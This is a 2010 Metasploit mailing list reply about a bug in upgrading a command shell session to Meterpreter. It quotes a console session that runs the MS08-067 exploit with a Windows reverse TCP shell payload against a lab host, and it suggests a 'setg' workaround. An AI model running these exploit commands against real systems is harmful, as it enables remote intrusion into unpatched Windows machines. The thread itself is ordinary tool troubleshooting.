Metasploit mailing list archives

Re: Errors with upgrading command shell to meterpreter

From: "Joshua J. Drake" <jdrake () metasploit com>
Date: Mon, 22 Mar 2010 14:48:46 -0500

On Mon, Mar 22, 2010 at 03:17:13PM -0400, David Kennedy wrote:

When doing for example MS08-067 and settings a windows/shell/reverse_tcp,
exploiting the bug then performing sessions -u 1 causes MSF to bomb out:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.33.129
LHOST => 192.168.33.129
smsf exploit(ms08_067_netapi) > set RHOST 192.168.33.130
RHOST => 192.168.33.130
msf exploit(ms08_067_netapi) > set target 3
target => 3
msf exploit(ms08_067_netapi) > exploit -j (-z does the same error msg)
[*] Exploit running as background job.
msf exploit(ms08_067_netapi) >
[*] Started reverse handler on 192.168.33.129:4444
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.33.129:4444 ->
192.168.33.130:1041)

msf exploit(ms08_067_netapi) > sessions -u 1
[-] Session manipulation failed: You must set LPORT and LHOST for this
script to work. ["/opt/metasploit3/msf3/lib/rex/script/base.rb:58:in `run'",
"/opt/metasploit3/msf3/lib/rex/script/base.rb:41:in `run'",
"/opt/metasploit3/msf3/lib/msf/base/sessions/command_shell.rb:104:in
`execute_script'",
"/opt/metasploit3/msf3/lib/msf/ui/console/command_dispatcher/core.rb:1260:in
`cmd_sessions'",
"/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:239:in `send'",
"/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:239:in
`run_command'",
"/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:201:in
`run_single'",
"/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:195:in `each'",
"/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:195:in
`run_single'", "/opt/metasploit3/msf3/lib/rex/ui/text/shell.rb:144:in
`run'", "./msfconsole:93"]
msf exploit(ms08_067_netapi) >


David,

Try using "setg" for "LHOST" and "LPORT". This is a workaround since
the script uses the datastore from the global context rather than the
exploit context...

I have updated ticket #394 to note this specific requirement. We'll do
our best to fix it up properly in the future :)

-- 
Joshua J. Drake

Attachment: _bin
Description:

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread:

Errors with upgrading command shell to meterpreter David Kennedy (Mar 22)
- Re: Errors with upgrading command shell to meterpreter Joshua J. Drake (Mar 22)